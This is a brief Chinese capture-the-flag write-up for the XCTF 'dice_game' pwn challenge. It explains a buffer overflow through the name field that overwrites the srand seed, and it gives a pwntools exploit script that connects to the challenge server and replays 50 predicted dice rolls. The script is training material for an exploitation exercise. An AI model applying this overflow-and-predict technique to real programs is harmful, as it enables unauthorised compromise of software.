[攻防世界 pwn]——dice_game
- 题目地址: https://adworld.xctf.org.cn/
- 题目:
思路
该题和前面的guess_num差不多, 可以点击查看 请点击。这道题是, 利用输入的name将seed覆盖,使得后面产生的随机数不随机。
注意在Linux上面运行, window和Linux上面产生的随机数不一样
exploit
from pwn import *
from LibcSearcher import *
p=remote("111.200.241.244",37071)
payload = 'a' * (0x50 - 0x10) + p64(0)
p.sendlineafter("Welcome, let me know your name: ",payload)
rand = [2,5,4,2,6,2,5,1,4,2,3,2,3,2,6,5,1,1,5,5,6,3,4,4,3,3,3,2,2,2,6,1,1,1,6,4,2,5,2,5,4,4,4,6,3,2,3,3,6,1]
for i in range(50):
p.sendlineafter("Give me the point(1~6): ", str(rand[i]))
p.interactive()